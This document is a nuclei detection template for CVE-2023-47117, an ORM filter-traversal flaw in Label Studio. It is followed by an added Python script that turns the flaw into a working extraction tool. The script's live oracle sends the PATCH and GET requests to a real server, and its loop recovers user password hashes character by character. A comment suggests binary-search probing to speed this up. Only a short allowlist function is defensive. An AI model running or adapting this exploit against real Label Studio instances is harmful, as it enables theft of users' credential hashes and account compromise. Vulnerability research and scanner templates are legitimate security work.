2024-07-08 11:49:10 +00:00
id: CVE-2023-47117

info:
  name: Label Studio - Sensitive Information Exposure
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The Data Manager view filter accepts arbitrary Django Object Relational Mapper (ORM) lookup paths. An authenticated attacker can therefore construct a filter chain that filters tasks on fields reached through relation traversals, including sensitive fields of every user account on the platform (for example password hashes). Because the regex filter reveals whether any task matched, the attacker can leak those fields character by character.
  reference:
    - https://security.snyk.io/vuln/SNYK-PYTHON-LABELSTUDIO-6056277
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47117
    - https://github.com/elttam/publications
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-47117
    cwe-id: CWE-200
    epss-score: 0.0009
    epss-percentile: 0.38398
    cpe: cpe:2.3:a:humansignal:label_studio:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: humansignal
    product: label_studio
    shodan-query: http.favicon.hash:-1649949475
  tags: cve,cve2023,label_studio,oss,exposure,authenticated

variables:
  Task_id: "{{task}}"
  Project_id: "{{project}}"

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/login/?next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on

      - |
        PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"id":{{Task_id}},"data":{"title":"Tasks","ordering":[],"type":"list","target":"tasks","filters":{"conjunction":"or","items":[{"filter":"filter:tasks:updated_by__active_organization__active_users__password","operator":"regex","value":"^pbkdf2_sha256\\$260000\\$","type":"String"}]},"hiddenColumns":{"explore":[],"labeling":[]},"columnsWidth":{},"columnsDisplayType":{},"gridWidth":4,"search_text":null},"project":"{{Project_id}}"}

      - |
        GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_4, "completed_at", "file_upload", "annotators")'
          - 'status_code_3==200 && status_code_4==200'
          - 'contains(header_4, "application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: csrf
        group: 1
        regex:
          - 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">'
        internal: true
# digest: 4a0a00473045022100efb2bff232c70a7681dabfdbe49a60c516fcd5f5e446af96976aa8295a59d6b20220612431a6a43f670e2023f79605bdb673f619d459e4d74126b8bfc430ff91f9af:922c64590222798bb761d5b6d8e72950
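The template only probes for the Django hasher prefix; the description's "character by character" step is left implicit. The script below is an added example, not code from the nuclei template or from the Label Studio project. It builds the same PATCH filter body as the template, treats "did any task come back?" as a boolean oracle, and extends a known prefix one character per round. The live oracle reproduces the template's last two API requests with the standard library only (it assumes the session cookie from the template's login POST and is not exercised offline); the simulated oracle and the sample hashes are constructed so the block runs without a server. The allowlist check at the end is an illustrative mitigation, not Label Studio's actual fix.

```python
"""CVE-2023-47117 filter-chain oracle, worked example (added here; not the
template's or Label Studio's code). Request paths and the filter JSON are
copied from the template; function names, sample hashes and the allowlist
are constructed for the example."""
import json
import re
import string
import urllib.request
from typing import Callable, Iterable, List

# Filter path from the template: task -> updated_by -> organisation -> every
# active user -> password hash. The ORM follows the whole chain unchecked.
SENSITIVE_FIELD = ("filter:tasks:updated_by__active_organization"
                   "__active_users__password")

# Django's default hasher prefix that the template probes for.
KNOWN_PREFIX = "pbkdf2_sha256$260000$"

# Characters that can appear in a pbkdf2_sha256 hash string (salt, '$', base64).
DEFAULT_ALPHABET = string.ascii_letters + string.digits + "+/=$"

# Oracle: regex -> True when at least one task is returned under that filter.
Oracle = Callable[[str], bool]


def build_filter_payload(view_id: int, project_id: int, regex: str) -> dict:
    """Body of PATCH /api/dm/views/<view_id>, as in the template; only the
    regex value changes between oracle queries."""
    return {
        "id": view_id,
        "data": {
            "title": "Tasks", "ordering": [], "type": "list", "target": "tasks",
            "filters": {"conjunction": "or", "items": [{
                "filter": SENSITIVE_FIELD, "operator": "regex",
                "value": regex, "type": "String"}]},
            "hiddenColumns": {"explore": [], "labeling": []},
            "columnsWidth": {}, "columnsDisplayType": {},
            "gridWidth": 4, "search_text": None,
        },
        "project": str(project_id),
    }


def leak_value(oracle: Oracle, known: str, alphabet: Iterable[str],
               max_len: int) -> str:
    """Extend `known` by one character per round of oracle queries.

    Candidates are re.escape()d because the pattern reaches the database's
    regex engine: a bare '$' or '+' from the hash would be read as a
    metacharacter (the template escapes the '$' in its prefix for the same
    reason). Stops when no candidate extends the prefix (end of value)."""
    alphabet = list(alphabet)
    while len(known) < max_len:
        for ch in alphabet:
            if oracle("^" + re.escape(known + ch)):
                known += ch
                break
        else:
            break
    return known


def simulated_oracle(hashes: List[str]) -> Oracle:
    """Offline stand-in for the PATCH + GET round trip. With the template's
    'or' conjunction over all active users, any user's hash matching suffices."""
    return lambda regex: any(re.search(regex, h) for h in hashes)


def label_studio_oracle(base_url: str, cookie: str, view_id: int,
                        project_id: int) -> Oracle:
    """Live oracle reproducing the template's last two requests (assumed
    session cookie from the login POST). Not run offline."""
    headers = {"Content-Type": "application/json", "Cookie": cookie}
    qs = f"interaction=filter&project={project_id}"

    def oracle(regex: str) -> bool:
        body = json.dumps(build_filter_payload(view_id, project_id, regex)).encode()
        patch = urllib.request.Request(
            f"{base_url}/api/dm/views/{view_id}?{qs}", data=body,
            headers=headers, method="PATCH")
        urllib.request.urlopen(patch).read()
        get = urllib.request.Request(
            f"{base_url}/api/tasks?page=1&page_size=30&view={view_id}&{qs}",
            headers=headers)
        page = urllib.request.urlopen(get).read().decode()
        # Same signal as the template's matcher: task objects carry these
        # keys, an empty result page does not.
        return all(k in page for k in ("completed_at", "file_upload", "annotators"))
    return oracle


# Defensive side: an allowlist of filterable columns (illustrative only).
ALLOWED_FILTER_PREFIXES = ("filter:tasks:id", "filter:tasks:completed_at",
                           "filter:tasks:data.")


def filter_is_allowed(field: str) -> bool:
    """Reject filters outside the allowlist and any '__' relation traversal,
    so an ORM lookup can never walk from a task to user records."""
    return field.startswith(ALLOWED_FILTER_PREFIXES) and "__" not in field
```

Each recovered character costs up to len(alphabet) PATCH + GET pairs; because the operator is a real regex, a practitioner would normally probe character classes such as `[a-m]` and binary-search instead. Note also that the `or` conjunction over all active users means the loop follows whichever user's hash sorts first at each branch point, so a recovered value is one real hash, not necessarily a chosen user's.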